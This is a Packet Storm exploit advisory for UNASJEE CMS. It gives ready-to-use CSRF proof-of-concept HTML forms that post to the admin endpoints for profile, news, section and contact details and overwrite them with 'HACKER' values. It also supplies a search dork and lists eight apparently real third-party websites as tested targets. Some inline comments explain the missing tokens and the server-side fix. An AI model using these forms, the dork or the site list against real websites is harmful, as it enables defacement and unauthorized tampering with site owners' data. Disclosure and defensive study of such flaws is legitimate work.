Unasjee CMS Cross Site Request Forgery

2015-03-24T00:00:00
ID PACKETSTORM:130978
Type packetstorm
Reporter KnocKout
Modified 2015-03-24T00:00:00

Description

                                        
                                            ` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Discovered by: KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] HomePage : http://h4x0resec.blogspot.com  
############################################################  
Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org   
############################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : UNASJEE CMS  
|~Affected Version : All Versions  
|~Vendor : http://www.unasjee.net/  
|~DORK : intext:Designed & Developed by: UNASJEE  
|~RISK : High  
|~Date: 22.03.2015  
|~Tested On : [L] Kali Linux  
####################INFO################################  
It is possible to post data to the admin panel without logging in;  
the server accepts the posted data unconditionally.  
########################################################  
Demo and Tested on;  
http://turnnersports.com  
http://www.badhawaind.com  
http://www.cliftonintl.com  
http://www.aqnaf.com  
http://shanisports.com  
http://tayyabgarments.com  
http://www.shreentrader.com  
http://www.moosaleathers.com  
----------------------------------------------------------  
----------------------------------------------------------  
Change Profile Detail PoC  
----------------------------------------------------------  
  
<!-- Change Profile Detail -->  
<!-- Exhibit: a plain HTML POST to admincp/updprofile.php carrying only the four
     fields below (pfid, sFullDescription, p1, Submit). Nothing in the request
     body binds it to the administrator's session: there is no anti-CSRF token
     field, and the author reports the endpoint accepts the post without a
     login check. The fix is server-side in updprofile.php: require an
     authenticated admin session, validate a per-session secret token submitted
     with the form, and set SameSite on the session cookie. -->  
<!-- Markup note: the fragment closes </html> without a <!doctype html>/<html>
     opener, and the trailing "/" on the void <input> elements is ignored by the
     parser. -->  
<body>  
<form action="http://[TARGET]/admincp/updprofile.php" method="POST">  
<!-- pfid=1: presumably the id of the profile record being overwritten — confirm against updprofile.php -->  
<input type="hidden" name="pfid" value="1" />  
<input type="hidden" name="sFullDescription" value="HACKERRRRRRR" />  
<input type="hidden" name="p1" value="HACKERRRRRRR" />  
<input type="hidden" name="Submit" value="Submit" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
----------------------------------------------------------  
Add News PoC   
----------------------------------------------------------  
  
<!-- Exhibit: the admin "Add News" form (fields ntitle, nDate, news), with its
     action re-pointed at http://[TARGET]/admincp/addnews.php. It carries no
     anti-CSRF token. The onSubmit handler checknForm() is client-side only and
     is not included in this snippet; it is no substitute for a server-side
     session and token check in addnews.php. The enclosing <table> of these
     rows is not part of the snippet. -->  
<form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();">  
<tr>   
<td valign="top" bgcolor="E8EEF3"><strong>  Title:   
</strong><span class="error">*</span> </td>  
<td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle">  
</td>  
</tr>  
<tr>   
<td valign="top" bgcolor="E8EEF3"><strong>  Date: </strong><span class="error">*</span></td>  
<td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate">  
 (YYYY-MM-DD)</td>  
</tr>  
<tr>   
<td width="25%" valign="top" bgcolor="E8EEF3"><strong>  News:<span class="error"> </span></strong><span class="error">*</span></td>  
<td width="75%" valign="top" bgcolor="E8EEF3">   
<textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> </td>  
<!-- image-type input acts as the submit button; the src is relative to the original admin panel -->  
<td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td>  
</tr>  
</form>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>   
<td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td>  
</tr>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>  
  
----------------------------------------------------------  
Add Products PoC   
----------------------------------------------------------  
  
  
<td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2">  
<!-- Exhibit: the admin "Add Main Section" form (fields SecName, show, bFile)
     with its action re-pointed at http://[TARGET]/admincp/addmainsection.php.
     As with the other forms there is no anti-CSRF token; the multipart
     enctype is required by the file input and is not a CSRF defence, and
     checkmsecForm() is a client-side handler not included here. The
     server-side fix is the same: authenticated admin session plus a validated
     per-session token in addmainsection.php. The enclosing <table> of these
     rows is outside the snippet. -->  
<form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();">  
<tr>   
<td width="29%" valign="top" bgcolor="E8EEF3">  <strong>Name:</strong></td>  
<td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName">   
 <font color="#FF0000">*</font></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3">  <strong>Show:</strong></td>  
<td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>   
<!-- show=y is pre-selected, so a submission with no user interaction sends "y" -->  
<td width="6%"><input name="show" type="radio" value="y" checked></td>  
<td width="13%">Yes</td>  
<td width="5%"><input type="radio" name="show" value="n"></td>  
<td width="76%">No</td>  
</tr>  
</table></td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> <strong> Category   
Image:</strong></td>  
<td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile">   
 70 x 62 px</td>  
</tr>  
<tr>   
<td bgcolor="E8EEF3"> </td>  
<td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td>  
</tr>  
</form>  
</table></td>  
</tr>  
</table></td>  
</tr>  
<tr>   
  
----------------------------------------------------------  
Change Contact Details PoC  
----------------------------------------------------------  
  
<!-- Exhibit: the admin "Change Contact Detail" form re-pointed at
     http://[TARGET]/admincp/updcontact.php. The hidden cid=1 selects the
     contact record; the fields pre-filled with "HACKER" mark which values the
     author demonstrates overwriting, the rest submit empty (presumably
     clearing the stored value — verify in updcontact.php). No anti-CSRF token
     is present. Fix server-side in updcontact.php: require an authenticated
     admin session, validate a per-session secret token, and set SameSite on
     the session cookie. -->  
<!-- Markup notes (inherited from the vendor's admin panel, not part of the
     finding): attribute values are unquoted, layout uses align/bgcolor and a
     table; the third e-mail row is labelled "E - Mail II" like the second; and
     the "Australian Office Address" textarea is named fax2. -->  
<form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" >  
<!-- cid=1: presumably the single contact record — confirm against updcontact.php -->  
<input type="hidden" name="cid" value="1">   
<table align=center width=525>  
<tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white">   
<td height="25" colspan=3><div align="center">Change   
your Contact Detail:</div></td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC">  First   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">   
<input name=cp1 type=text id="cp1" value="HACKER"></td>  
<td width="16"> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd1 type=text id="cpd1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm1 type=text id="cpm1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC">  Second   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">  
<input name=cp2 type=text id="cp2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd2 type=text id="cpd2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm2 type=text id="cpm2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%" height="25" bgcolor="#CCCCCC"> Third   
Contact Person:</td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Contact Person:</td>  
<td width="75%">  
<input name=cp3 type=text id="cp3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Designation:</td>  
<td width="75%">  
<input name=cpd3 type=text id="cpd3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Mobile:</td>  
<td width="75%">  
<input name=cpm3 type=text id="cpm3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone I:</td>  
<td width="75%">  
<input name=ph1 type=text id="ph1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone II:</td>  
<td width="75%">  
<input name=ph2 type=text id="ph2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Phone III:</td>  
<td width="75%">  
<input name=ph3 type=text id="ph3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Fax I:</td>  
<td width="75%">  
<input name=fax1 type=text id="fax1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">E - Mail I:</td>  
<td width="75%">  
<input name=email1 type=text id="email1" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">E - Mail II:</td>  
<td width="75%">  
<input name=email2 type=text id="email2" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<!-- label repeats "E - Mail II" although the field is email3 -->  
<td width="35%">E - Mail II:</td>  
<td width="75%">  
<input name=email3 type=text id="email3" value=""></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%"> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%">Web Site:</td>  
<td width="75%">  
<input name=web type=text id="web" value="HACKER"></td>  
<td> </td>  
</tr>  
<tr>  
<td> </td>  
<td> </td>  
<td> </td>  
</tr>  
<tr>  
<td>Skype:</td>  
<td><input name=skype type=text id="skype" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>Yahoo:</td>  
<td><input name=yahoo type=text id="yahoo" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>gTalk:</td>  
<td><input name=gtalk type=text id="gtalk" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td>MSN:</td>  
<td><input name=msn type=text id="msn" value=""></td>  
<td> </td>  
</tr>  
<tr>  
<td> </td>  
<td> </td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"><div><strong>Asia Head Office Address:</strong></div>  
<br></td>  
<td width="75%">  
<textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"><strong>Hong Kong Office Address:</strong> </td>  
<td width="75%">  
<textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td>  
<td> </td>  
</tr>  
<tr>  
<td><strong>Australian Office Address:</strong></td>  
<!-- field name fax2 does not match its label -->  
<td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td>  
<td> </td>  
</tr>  
<tr>   
<td width="35%"> </td>  
<td width="75%">  
<input type="submit" name="Submit" value="Submit">  
<input name="reset" type="reset" id="reset" value="Reset"></td>  
<td> </td>  
</tr>  
</table>  
  
</form>  
  
`